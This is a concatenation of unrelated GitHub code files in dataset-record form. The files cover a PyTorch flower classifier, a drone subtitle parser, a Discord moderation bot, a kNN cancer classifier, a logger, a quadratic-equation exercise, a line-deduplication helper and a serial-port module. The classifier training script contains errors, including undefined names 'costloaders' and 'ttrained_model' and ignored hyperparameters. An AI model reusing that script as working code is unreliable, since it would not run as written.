\n\ndata_dir = 'flowers'\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n#------------------------------------------------\n\ntrain_transforms = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomRotation(30),\n transforms.RandomHorizontalFlip(),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(), transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),])\n\nvalid_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], \n [0.229, 0.224, 0.225])\n ])\n\n\n# TODO: Load the datasets with ImageFolder\ntrain_datasets = datasets.ImageFolder(train_dir,transform=train_transforms) \nvalid_datasets = datasets.ImageFolder(valid_dir,transform=valid_transforms) \n \n\nimage_datasets = {\"train\": train_datasets, \n \"validation\": valid_datasets \n }\n\n# TODO: Using the image datasets and the trainforms, define the dataloaders\ntrainloaders = torch.utils.data.DataLoader(train_datasets,batch_size=34, shuffle=True)\nvalidloaders = torch.utils.data.DataLoader(valid_datasets,batch_size=34)\n\ndataloaders= [trainloaders, validloaders]\n\n#------------------------------------------------\ndef create_model(arch='vgg19', hidden_units=1024,learning_rate=0.001):\n '''\n function builds model\n input: model architecture, hidden units, and learning rate\n output:model, criterion, optimizer, scheduler\n '''\n #load a pretraind network: chose vgg19 \n model = getattr(models, arch)(pretrained=True)\n in_features= model.classifier[0].in_features\n #model\n #turn off gradients for our model \n for param in model.parameters():\n param.requires_grad= False\n #defining a new feed-forward classifier using ReLu activation function\n classifier= nn.Sequential(OrderedDict([\n ('fc1',nn.Linear(in_features,hidden_units)),\n ('relu',nn.ReLU()),\n ('drop', nn.Dropout(0.2)),\n ('fc2',nn.Linear(1024,102)),\n ('output',nn.LogSoftmax(dim=1))\n ]))\n model.classifier=classifier\n model\n #define negative log likelihood loss\n criterion= nn.NLLLoss()\n #define optimizer \n optimizer= optim.Adam(model.classifier.parameters(), lr=0.002)\n #scheduler= lr_scheduler.stepLR(optimizer, step_size=2, gamma=0.1, epoch=-1)\n \n return model, criterion, optimizer\n#------------------------------------------------\nmodel, criterion, optimizer= create_model(arch, hidden_units, learning_rate)\nprint('-' * 10)\nprint('your model was successfully built!')\nprint('-' * 10)\n#------------------------------------------------\ndef train_model(model, criterion, optimizer, epochs=4):\n '''\n function: trains the pretrained model and classifier on the image datasets, and validates.\n input:model, criterion, optimizer, epochs(default=4)\n output: trained model\n \n '''\n print_every=5\n running_loss=0\n accuracy=0\n step=0\n run_accuracy=0\n train_losses, valid_losses = [], []\n train_accuracy, valid_accuracy = [], []\n model.to(device)\n \n #define best model wheights and best accuracy\n \n\n print('begin training')\n start=time.time()\n #start training \n\n # 1- training loop: looping through epochs\n model.train()\n\n for epoch in range (epochs):\n print('Epoch {}/{}'.format(epoch+1, epochs))\n print('-' * 10)\n \n # 2- looping through data\n for inputs,labels in trainloaders:\n \n \n #move input & label tensors to default device\n inputs, labels= inputs.to(device), labels.to(device)\n step+=1\n optimizer.zero_grad()\n #Forward\n log_ps=model.forward(inputs)\n loss=criterion(log_ps, labels)\n #Backward\n loss.backward()\n #take a step\n optimizer.step()\n #increment running loss, it's where we keep track of our running loss\n running_loss+=loss.item()\n \n # calculate the accuracy\n ps = torch.exp(log_ps) # get the actual probability\n top_p, top_class = ps.topk(1, dim=1) # top probabilities and classes\n equals = top_class == labels.view(*top_class.shape)\n \n run_accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n \n if step% print_every==0:\n valid_loss=0\n accuracy=0\n model.eval()\n with torch.no_grad():\n for inputs,labels in validloaders:\n \n inputs, labels= inputs.to(device), labels.to(device)\n log_ps=model.forward(inputs)\n batch_loss=criterion(log_ps, labels)\n valid_loss+=batch_loss.item()\n #calculating accuracy\n ps = torch.exp(log_ps)\n #top class, largest value in our prob.\n top_p, top_class = ps.topk(1, dim=1)\n #check for equality\n equals = top_class == labels.view(*top_class.shape)\n accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n \n \n \n \n \n train_losses.append(running_loss/len(trainloaders))\n valid_losses.append(valid_loss/len(costloaders))\n train_accuracy.append(run_accuracy/len(trainloaders))\n valid_accuracy.append(accuracy/len(costloaders))\n \n print(\n f\"Train loss: {running_loss/print_every:.3f}.. \"\n f\"Valid loss: {valid_loss/len(costloaders):.3f}.. \"\n f\"Train accuracy: {run_accuracy/print_every:.3f}.. \"\n f\"Valid accuracy: {accuracy/len(costloaders):.3f}.. \") \n \n #turn our running loss back to zero \n running_loss=0\n model.train()\n \n \n \n time_elapsed = time.time() - start\n print(\"\\nTotal time: {:.0f}m {:.0f}s\".format(time_elapsed//60, time_elapsed % 60))\n\n return model\n#------------------------------------------------\ntrained_model= train_model(model,criterion,optimizer,epochs)\n\n#------------------------------------------------\n\ndef save_model(trained_model):\n '''\n function saves our trained model\n input: model\n '''\n trained_model.class_to_idx = image_datasets['train'].class_to_idx\n trained_model.cpu()\n save_dir= ''\n #checkpoint dictionary\n check_point= {\n 'epochs': epochs,\n 'arch': arch,\n 'hidden_units': hidden_units,\n 'classifier': trained_model.classifier,\n 'state_dict': ttrained_model.state_dict(),\n 'class_to_idx': trained_model.class_to_idx\n }\n if args.save_dir:\n save_dir=args.save_dir\n else:\n save_dir='checkpoint.pth'\n torch.save(check_point, save_dir)\n#------------------------------------------------\nsave_model(trained_model)\nprint('-' * 10)\nprint(trained_model)\nprint('your model has been successfully saved!')\nprint('-' * 10)\n\n#------------------------------------------------\n\n\n\n\n\n\n\n \n","repo_name":"ReemHassab/build-your-own-image-classifier","sub_path":"train-2.py","file_name":"train-2.py","file_ext":"py","file_size_in_byte":9464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15878775382","text":"import subprocess as sp\nimport json\nimport re\n\n\nclass SubtitleRow:\n def __init__(self, gps: str, alt:float, h_speed: float, v_speed: float) -> None:\n self.h_speed = h_speed\n self.v_speed = v_speed\n self.alt = alt\n self.lon, self.lat = [float(x) for x in gps[5:-1].split(', ')][:2]\n\nclass SubtitleExtractor:\n def __init__(self) -> None:\n pass\n\n def __call__(self, video_path: str) -> dict:\n out = sp.run(['ffprobe','-of','json','-show_entries', 'format:stream', video_path],\\\n stdout=sp.PIPE, stderr=sp.PIPE, universal_newlines=True)\n\n results = json.loads(out.stdout)\n \n metadata_format = results['format']['tags']\n \n out = sp.run(['ffmpeg','-i',video_path, '-map', 's:0', '-f','webvtt','-'],\\\n stdout=sp.PIPE, stderr=sp.PIPE, universal_newlines=True)\n \n subtitle = out.stdout\n \n parsed_subtitle = self.__parse_subtitle(subtitle)\n \n return parsed_subtitle\n\n def __parse_subtitle(self, subtitle: str) -> dict:\n subtitle = subtitle.split('\\n')[2:]\n \n parsed = {}\n \n for i in range(0, len(subtitle), 4):\n m, s = subtitle[i].split(' ')[0].split('.')[0].split(':')\n timestamp = int(m) * 60 + int(s)\n \n row = subtitle[i+1]\n \n gps = re.search(r'GPS \\([0-9]+\\.[0-9]+, [0-9]+\\.[0-9]+, [0-9]+\\)', row)[0]\n h_s = float(re.search(r'H.S -*[0-9]+\\.[0-9]+', row)[0].split(' ')[1])\n v_s = float(re.search(r'V.S -*[0-9]+\\.[0-9]+', row)[0].split(' ')[1])\n alt = float(re.search(r'H -*[0-9]+\\.[0-9]+', row)[0].split(' ')[1])\n\n parsed[timestamp] = SubtitleRow(gps, alt, h_s, v_s)\n \n return parsed\n \n \n \n","repo_name":"PUTvision/UAVBillboards","sub_path":"app/src/subtitle_extractor.py","file_name":"subtitle_extractor.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40861023265","text":"from typing import MutableMapping, Optional\nimport discord\nfrom discord import mentions\nfrom discord.embeds import Embed\nfrom discord.errors import ConnectionClosed\nfrom discord.ext import commands\nimport sqlite3\nimport aiofiles\nimport asyncio\nimport re\nimport aiosqlite\nimport time\ni = 1\ntime_regex = re.compile(\"(?:(\\d{1,5})(h|s|m|d))+?\")\ntime_dict = {\"h\":3600, \"s\":1, \"m\":60, \"d\":86400}\n\n\n\n\n\nclass TimeConverter(commands.Converter):\n async def convert(self, ctx, argument):\n args = argument.lower()\n matches = re.findall(time_regex, args)\n time = 0\n for v, k in matches:\n try:\n time += time_dict[k]*float(v)\n except KeyError:\n raise commands.BadArgument(\"{} is an invalid time-key! h/m/s/d are valid!\".format(k))\n except ValueError:\n raise commands.BadArgument(\"{} is not a number!\".format(v))\n return time\n\n\nclass moderation(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n @commands.has_permissions(manage_roles=True)\n async def mute(self, ctx, member : discord.Member, time: TimeConverter, *, reason = None):\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\")\n await member.add_roles(role)\n await ctx.send((\"Muted {} for {}s\" if time else \"Muted {}\").format(member, time))\n type = \"Mute\"\n warndb = sqlite3.connect(\"./moderation/logs/logs.db\")\n warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, time, type))\n warndb.commit()\n if time:\n await asyncio.sleep(time)\n await member.remove_roles(role)\n else:\n return\n\n\n\n #Warning sys \n @commands.command(name='warn')\n @commands.has_permissions(kick_members=True)\n async def warn(self, ctx, member : discord.Member, *, reason):\n type = \"warn\"\n duration = \"None\"\n warndb = await aiosqlite.connect(\"./moderation/logs/logs.db\")\n await warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n await warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, duration , type))\n await warndb.commit()\n await ctx.reply(f\"Warned user {member.display_name}! \", mention_author=True)\n try:\n await warndb.close()\n except ConnectionClosed:\n pass\n\n\n#Modlogs\n @commands.command(name='modlogs')\n @commands.guild_only()\n @commands.has_permissions(kick_members=True)\n async def modlogs(self, ctx, member: discord.Member ):\n warndb = await aiosqlite.connect('./moderation/logs/logs.db')\n index = 0\n embed = discord.Embed(name=f\"Showing modlogs for {member.id}\", description = \"___ ___\", color = discord.Color.red())\n msg = await ctx.send(embed=embed)\n try:\n async with warndb.execute('SELECT admin_id, reason, logtype, duration FROM logs WHERE guild_id = ? AND user_id = ?', (ctx.guild.id, member.id,)) as cursor:\n async for entry in cursor:\n admin_id, reason, logtype, duration = entry\n admin_name = self.bot.get_user(admin_id)\n index += 1\n embed.add_field(name=f\"**Case:**{index}\", value=f\"**User:**({member.id}){member.mention}\\n **Type:**{logtype}\\n **Admin:**{admin_name.name}#{admin_name.discriminator}\\n **Reason:**{reason}\\n **Duration:**{duration}\", inline=False)\n await msg.edit(embed=embed)\n await warndb.close()\n except ConnectionClosed:\n pass\n\n\n\n @commands.command(name='ban')\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member : discord.Member = None, *, reason):\n logchannel = self.bot.get_channel(894251500392570881)\n type = \"Ban\"\n\n if member is not None:\n if member is not ctx.author:\n await member.ban(reason=reason)\n\n warndb = sqlite3.connect(\"./moderation/logs/logs.db\")\n warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, None, type))\n embed = discord.Embed(description =f\" **Banned user✅ ** {member.mention} Moderator: {ctx.author.mention} Reason: {reason} \")\n await logchannel.send(embed=embed)\n else:\n await ctx.reply(\"You can't ban yourself!\")\n else:\n await ctx.reply(\"The member is either not found or something went wrong!\")\n \n @commands.command(name='kick')\n @commands.has_permissions(kick_members=True)\n async def kick (self, ctx, member : discord.Member = None, *, reason):\n type = \"Kick\"\n logchannel = self.bot.get_channel(894251500392570881)\n\n if member is not None:\n if member is not ctx.author:\n await member.kick(reason=reason)\n warndb = sqlite3.connect(\"./moderation/logs/logs.db\")\n warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, None, type))\n embed = discord.Embed(description =f\" **Kicked user✅ ** {member.mention} Moderator: {ctx.author.mention} Reason: {reason} \")\n await ctx.send(embed=embed)\n await logchannel.send(embed=embed)\n else:\n return await ctx.reply(\"You can not kick yourself!\")\n else:\n await ctx.reply(\"Either the member was not found or something went wrong!\")\n\n\n\n @commands.command(name='clear')\n @commands.has_permissions(manage_messages=True)\n async def clear (self, ctx, amount = 100):\n await ctx.channel.purge(limit=1)\n await ctx.channel.purge(limit = amount)\n await ctx.send(\"Channel Cleared!\")\n \n\n\n @commands.command(name='delchannel')\n @commands.has_permissions(kick_members=True)\n async def remove_channel(self, ctx, channel : discord.TextChannel):\n await channel.delete()\n await ctx.send(\"Channel deleted!\")\n \n @commands.command(name='ping')\n async def ping(self, ctx):\n msg = await ctx.send(\"Getting Ping....\")\n await asyncio.sleep(2)\n await msg.edit(content='Pong! `{0} ms `'.format(round(self.bot.latency * 1000)))\n \n\n @commands.command(name='apr')\n @commands.has_permissions(ban_members = True)\n async def apr(self, ctx):\n embed = discord.Embed(name='**#Apply channel rules and instructions!**', color = discord.Color.red())\n\n embed.set_thumbnail(url= ctx.guild.icon_url)\n embed.add_field(name='***Rules and instructions***', value=\"Instructions on how to apply and what to/ not to do.\", inline=False)\n embed.add_field(name='**How to apply?**', value=\"To apply goto <#911671525277569044> and type v!apply\")\n embed.add_field(name='**What will happen once I typed v!apply?**', value=\"The bot will dm you asking you if you wish to start. To start type v!answer. The bot will load all questions and then sends them one by one. With every question you are allowed to type your answer (With spaces) before it sends the next one. Do that until a confirmation screen pops up with a review of your questions. There will be two buttons under that screen with a ✅ or❌. Pressing the checkmark will confirm your application and send it. Pressing the cross mark will cancel it. You'll need to type v!answer again.\", inline=False)\n embed.add_field(name=\"**What happens once I sent the application?**\", value=\"The application will be reviewed and you will get a dm from the bot once you are accepted or denied. Depending on the result a staff team member will contact you about it.\", inline=False)\n embed.add_field(name=\"**Why did my message get deleted in ☄˚˚✎apply「📝」 ?**\", value=\"Messages in #apply will be instantly deleted to prevent clutter and for these rules to stay visible. This **DOES NOT** mean the command will not work!\", inline=False)\n embed.add_field(name=\"**It says my application got deleted because something was wrong?**\", value=\"It seens you either failed to answer the questions correctly or entered false or spamming answers. Please re-apply again with the correct format!\", inline=False)\n embed.add_field(name=\"**NOTE:**\", value=\"Do **NOT** apply more then once. this messes up the application system and will cause your application to be deleted straight away. If it encounters any error dm <@521028748829786134> with the error code instead!\", inline=False)\n embed.set_footer(text=\"Made by Senpai_Desi#4108\")\n await ctx.send(embed=embed)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef setup(bot):\n bot.add_cog(moderation(bot))","repo_name":"SenpaiDesi/Vandals-Bot","sub_path":"moderation/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":9553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2804689536","text":"#Importing required libraries\r\nimport numpy as np\r\nfrom sklearn import preprocessing, model_selection, neighbors\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd \r\n\r\n#Creating a data frame with pandas\r\ndf = pd.read_csv('breast-cancer-wisconsin.data.txt')\r\n\r\n#Could get away with dropping samples with missing values, however it is better practice to make them outliers.\r\n#df.dropna('?')\r\ndf.replace('?', -99999, inplace=True)\r\n\r\n#ID is arbitrary, does not contribute towards prediction\r\ndf.drop(['id'], 1, inplace=True)\r\n\r\n#Create features and class matrices to train the algorithm on\r\nX = np.array(df.drop(['class'], 1))\r\ny = np.array(df['class'])\r\n\r\n#Train a model\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X,y,test_size=0.25)\r\nclf = neighbors.KNeighborsClassifier()\r\nclf.fit(X_train, y_train)\r\n\r\n#Testing accuracy of this model\r\naccuracy = clf.score(X_test, y_test)\r\nprint(accuracy)\r\n#Note: accuracy ranges from roughly 0.94 to 0.96. This is because 'k' may be different everytime the model is run.\r\n\r\n#Testing unseen data i.e. new patient\r\n#new_patient = np.array([3,2,5,1,1,2,10,8,4])\r\n#diagnosis = clf.predict(new_patient)\r\n#print(diagnosis)","repo_name":"zoltanmathias/Diagnosing-breast-cancer-with-nearest-neighbors","sub_path":"kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"294311488","text":"\"\"\"Provides a class Logger with methods for logging.\"\"\"\nfrom contextlib import contextmanager\nfrom dataclasses import dataclass\nimport logging\nimport os\nimport sys\nimport threading\nfrom typing import cast, Any, Callable, Dict, Generator, List, MutableMapping, Tuple, Type, Union\n\nimport structlog\nfrom structlog.stdlib import BoundLogger, get_logger as get_bound_logger\n\n\n@dataclass(frozen=True)\nclass EventName:\n \"\"\"Dataclass for log event names.\n\n Args:\n name: name of this event\n \"\"\"\n\n name: str\n\n\nclass LogEventMeta(type):\n \"\"\"Metaclass for LogEvents. This allows EventNames to specified in subclasses of BaseLogEvent\n as empty typed variables e.g.\n\n AuthToAccountStart: EventName\n\n Rather than requiring\n\n AuthToAccountStart: EventName(\"AuthToAccountStart\")\n \"\"\"\n\n def __new__(\n mcs, name: str, bases: Tuple[Type, ...], namespace: Dict[str, Any]\n ) -> \"LogEventMeta\":\n for annotation in namespace.get(\"__annotations__\", []):\n namespace[annotation] = EventName(annotation)\n return cast(LogEventMeta, super().__new__(mcs, name, bases, namespace))\n\n\n@dataclass(frozen=True)\nclass BaseLogEvent(metaclass=LogEventMeta):\n \"\"\"Base class for LogEvent classes\"\"\"\n\n\nclass Singleton(type):\n \"\"\"Singleton Metaclass\"\"\"\n\n _instances: Dict[Type[Any], Any] = {}\n\n def __call__(cls, *args: Any, **kwargs: Union[int, str, Dict]) -> Any:\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass BaseLogger:\n \"\"\"Provides contextmanager 'bind' which can be use to bind\n keys to the logger using 'with' syntax, they will be removed from the logger\n in subsequent calls. In general use Logger, not BaseLogger directly.\"\"\"\n\n def __init__(self, log_tid: bool = True, pretty_output: bool = False) -> None:\n self._log_tid = log_tid\n self.logger_stack = threading.local()\n self.pretty_output = pretty_output\n log_processors: List[\n Union[\n structlog.dev.ConsoleRenderer,\n structlog.processors.JSONRenderer,\n Callable[[logging.Logger, str, MutableMapping[str, Any]], MutableMapping[str, Any]],\n ]\n ] = [\n structlog.stdlib.add_log_level,\n structlog.stdlib.filter_by_level,\n structlog.processors.TimeStamper(fmt=\"iso\"),\n structlog.processors.StackInfoRenderer(),\n structlog.processors.format_exc_info,\n ]\n\n if os.environ.get(\"DEV_LOG\", \"0\") == \"1\" or self.pretty_output:\n log_processors.append(structlog.dev.ConsoleRenderer(colors=True, force_colors=True))\n else:\n log_processors.append(structlog.processors.JSONRenderer(sort_keys=True))\n\n structlog.configure(\n logger_factory=structlog.stdlib.LoggerFactory(), processors=log_processors\n )\n \"\"\"\n altimeter/core/log.py:83: error: Argument \"processors\" to \"configure\" has incompatible type\n \"List[object]\"; expected\n \"Optional[Iterable[Callable[[Any, str, MutableMapping[str, Any]], Union[Mapping[str, Any], str, bytes, Tuple[Any, ...]]]]]\"\n \"\"\"\n\n logging.basicConfig(\n level=os.environ.get(\"LOG_LEVEL\", \"INFO\"), stream=sys.stdout, format=\"%(message)s\"\n )\n logging.getLogger(\"botocore\").setLevel(logging.ERROR)\n\n def _get_loggers(self) -> List[BoundLogger]:\n if not hasattr(self.logger_stack, \"loggers\"):\n self.logger_stack.loggers = []\n return self.logger_stack.loggers\n\n def _get_current_logger(self) -> BoundLogger:\n loggers = self._get_loggers()\n if not loggers:\n logger = get_bound_logger()\n if self._log_tid:\n logger = logger.bind(tid=threading.get_ident())\n loggers.append(logger)\n return loggers[-1]\n\n def debug(self, event: EventName, **kwargs: Any) -> None:\n \"\"\"Create DEBUG level log entry.\n\n Args:\n event: EventName object for this event\n kwargs: log event k/vs\n \"\"\"\n self._get_current_logger().debug(event=event.name, **kwargs)\n\n def info(self, event: EventName, **kwargs: Any) -> None:\n \"\"\"Create INFO level log entry.\n\n Args:\n event: EventName object for this event\n kwargs: log event k/vs\n \"\"\"\n self._get_current_logger().info(event=event.name, **kwargs)\n\n def warn(self, event: EventName, **kwargs: Any) -> None:\n \"\"\"Create WARN level log entry.\n\n Args:\n event: EventName object for this event\n kwargs: log event k/vs\n \"\"\"\n self._get_current_logger().warn(event=event.name, **kwargs)\n\n def warning(self, event: EventName, **kwargs: Any) -> None:\n \"\"\"Create WARN level log entry.\n\n Args:\n event: EventName object for this event\n kwargs: log event k/vs\n \"\"\"\n self._get_current_logger().warning(event=event.name, **kwargs)\n\n def error(self, event: EventName, **kwargs: Any) -> None:\n \"\"\"Create ERROR level log entry.\n\n Args:\n event: EventName object for this event\n kwargs: log event k/vs\n \"\"\"\n self._get_current_logger().error(event=event.name, **kwargs)\n\n @contextmanager\n def bind(self, **bindings: Any) -> Generator[None, None, None]:\n \"\"\"Context manager to bind a set of k/vs to the logger. The k/vs will be removed\n when the with block exits.\"\"\"\n new_logger = self._get_current_logger().bind(**bindings)\n loggers = self._get_loggers()\n loggers.append(new_logger)\n try:\n yield\n finally:\n loggers.pop()\n\n\nclass Logger(BaseLogger, metaclass=Singleton):\n \"\"\"Singleton logger class\"\"\"\n\n pass\n","repo_name":"tableau/altimeter","sub_path":"altimeter/core/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"71915841768","text":"########\n# autora: danielle8farias@gmail.com \n# repositório: https://github.com/danielle8farias\n# Descrição: Usuário informa o valor das raízes e programa retorna a qual equação do 2º grau elas pertencem.\n########\n\n#criando função que multiplica as raízes\ndef multip_raizes(x1, x2):\n #retorno da função\n return x1 * x2\n\n\ndef somar_raizes(x1, x2):\n #retorno da função\n return x1 + x2\n\n\ndef montar_equacao(x1, x2):\n #chamando funções dentro da função e guardando o retorno nas variáveis\n b = somar_raizes(x1, x2)\n c = multip_raizes(x1, x2)\n #sabendo-se que soma = -b e multiplicação = c; a = 1\n # X² - bX + c\n\n #condicional\n\n #para b negativo\n #se b for um valor negativo e c for positivo\n if b < 0 and c > 0:\n #b*-1 para retirar o sinal negativo de b\n print(f'A equação é: X² + {b*-1}X + {c}')\n #else if\n #senão, se b for um valor negativo e c também\n elif b < 0 and c < 0:\n print(f'A equação é: X² + {b*-1}X - {c*-1}')\n #senão, se b for um valor negativo e c for igual a zero\n elif b < 0 and c == 0:\n print(f'A equação é: X² + {b*-1}X')\n\n #para b positivo\n #senão, se b for um valor positivo e c também\n elif b > 0 and c > 0:\n print(f'A equação é: X² - {b}X + {c}')\n #senão, se b for um valor positivo e c for negativo\n elif b > 0 and c < 0:\n print(f'A equação é: X² - {b}X - {c*-1}')\n #senão, se b for um valor positivo e c for igual a zero\n elif b > 0 and c == 0:\n print(f'A equação é: X² - {b}X')\n\n #para b igual a zero\n #senão, se b for um igual a zero e c for positivo\n elif b == 0 and c > 0:\n print(f'A equação é: X² + {c}')\n #senão, se b for um igual a zero e c for negativo\n elif b == 0 and c < 0:\n print(f'A equação é: X² - {c*-1}')\n #senão para b e c iguais a zero\n # elif b == 0 and c == 0:\n else:\n print(f'A equação é: X²')\n\n\nif __name__ == '__main__':\n #chamando função dentro da função\n montar_equacao(2, 3) #raízes\n montar_equacao(-2, -1)\n montar_equacao(3, 3)\n montar_equacao(-3, 2)\n montar_equacao(-1, 0)\n montar_equacao(0, 0)\n","repo_name":"danielle8farias-zz/hello-world-python3","sub_path":"exercicio_py/ex0031_equacao_2_grau/main_v0.py","file_name":"main_v0.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33833196521","text":"import os\r\nimport time\r\n\r\n\r\ndef add_combo(txt):\r\n add_combo_input = str(input(\"{} (Oui/Non)\".format(txt)))\r\n if add_combo_input == \"Oui\":\r\n with open(\"combo.txt\", \"a+\") as FILE:\r\n FILE.write(\"Mettez votre combo !\")\r\n FILE.close()\r\n print(\"Veuillez ajouter une combo svp !\")\r\n time.sleep(5)\r\n quit()\r\n elif add_combo_input != \"Non\":\r\n print(\"Je ne vous ai pas compris .\")\r\n return add_combo(txt)\r\n else:\r\n quit()\r\n\r\n\r\ndef del_dupli(x):\r\n return list(dict.fromkeys(x))\r\n\r\n\r\ndef create_txt_dupli(x):\r\n if os.path.exists(combo_dupli):\r\n os.remove(combo_dupli)\r\n for combo in x:\r\n with open(combo_dupli, \"a+\") as file:\r\n file.write(combo)\r\n file.close()\r\n\r\n\r\ndef exist(name):\r\n if os.path.exists(name) is not False:\r\n # Nombre de ligne dans la combo\r\n num_lines_combo = sum(1 for line in open(name))\r\n print(\"Il y a\", num_lines_combo, \"de\", name)\r\n else:\r\n print(\"Il n'y a pas de {}\".format(name))\r\n\r\n\r\ncombo_dupli = \"Combo/Combo_Duplicate_Removed.txt\"\r\ndivers = \"Combo/Divers.txt\"\r\n","repo_name":"Toxi91/Trieur","sub_path":"Model/modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24238173688","text":"import datetime as dt\nimport pickle\nimport time\nimport tkinter as tk\n\nimport serial\n\nfrom gui.base import GUI, ButtonEntry\n\n\nclass COMPortFrame(ButtonEntry):\n \"\"\"docstring\"\"\"\n\n # TODO migrate to frames\n\n def __init__(self, parent, name=None, serial_idx=None):\n alt = f\"{name.upper()} COM PORT\"\n super(COMPortFrame, self).__init__(parent, name, alt=alt)\n\n assert not serial_idx is None\n self.serial_idx = serial_idx\n # TODO fix layout\n\n def command(self):\n COM.set(self.serial_idx)\n\n\nclass COM:\n \"\"\"singleton communication handler\"\"\"\n\n ser = [None, None]\n alms = []\n style, text = None, None\n startup = None\n\n teensy, arduino = None, None\n\n def __init__(self, startup=None):\n print(\"initiate serial communitation\")\n\n COM.startup = startup\n\n @classmethod\n def build(cls, parent):\n \"\"\"builds gui interface\"\"\"\n\n if COM.teensy is None:\n COM.teensy = COMPortFrame(parent, name=\"teensy\", serial_idx=0)\n if COM.arduino is None:\n COM.arduino = COMPortFrame(parent, name=\"arduino\", serial_idx=1)\n\n @classmethod\n def set(cls, idx=0):\n \"\"\"set serial communication\"\"\"\n\n assert COM.startup\n\n now = dt.datetime.now().strftime(\"%B %d %Y - %I:%M%p\")\n board = [\"TEENSY 4.1 CONTROLLER\", \"ARDUINO IO BOARD\"][idx]\n baud = [9600, 115200][idx]\n\n def log_message(msg):\n try:\n GUI.tabs[\"6\"].ElogView.insert(tk.END, f\"{now} - {msg}\")\n value = GUI.tabs[\"6\"].ElogView.get(0, tk.END)\n pickle.dump(value, open(\"ErrorLog\", \"wb\"))\n except Exception as ex:\n print(ex)\n\n try:\n port = \"/dev/cu.usbmodem123843001\"\n COM.ser[idx] = serial.Serial(port, baud, timeout=10) # , timeout=2)\n\n text = f\"COMMUNICATIONS STARTED WITH {board}\"\n\n # TODO: use log_message()\n # TODO: make util.py\n\n print(text)\n COM.alarm(text, False)\n log_message(text)\n time.sleep(1)\n COM.ser[idx].flushInput()\n COM.startup()\n\n except Exception as ex:\n\n text = f\"UNABLE TO ESTABLISH COMMUNICATIONS WITH {board}\"\n print(text)\n raise(ex)\n COM.alarm(text, True)\n log_message(text)\n\n @classmethod\n def register_alm(cls, alm):\n \"\"\"registers alarm label\"\"\"\n COM.alms.append(alm)\n\n def alarm(text, red=True):\n \"\"\"docstring\"\"\"\n\n style = \"Warn.TLabel\" if red else \"OK.TLabel\"\n if not style:\n raise Exception(\"TODO get new style\")\n\n for alm in COM.alms:\n alm.config(text=text, style=style)\n\n @classmethod\n def write(cls, command, idx=0):\n \"\"\"docstring\"\"\"\n\n print(\"command:\", command.strip(\"\\n\"))\n ser = COM.ser[idx]\n\n ser.write(command.encode())\n ser.flush()\n response = ser.readline().strip().decode('utf-8') or ''\n\n print(\"response:\", response or None)\n print()\n return response\n\n\n @classmethod\n def quick_write(cls,command, idx=0):\n \"\"\"doesnt wait for a response\"\"\"\n\n print(\"command:\", command.strip(\"\\n\"))\n ser = COM.ser[idx]\n\n ser.write(command.encode())\n ser.flush()\n print()\n return ''\n\n\n @classmethod\n def close(cls):\n \"\"\"docstring\"\"\"\n\n print()\n for i, ser in enumerate(COM.ser):\n try:\n ser.close()\n print(f'closed {ser.port}')\n except Exception as ex:\n pass\n\n","repo_name":"mhyatt000/AR4","sub_path":"general/com.py","file_name":"com.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29313012087","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def 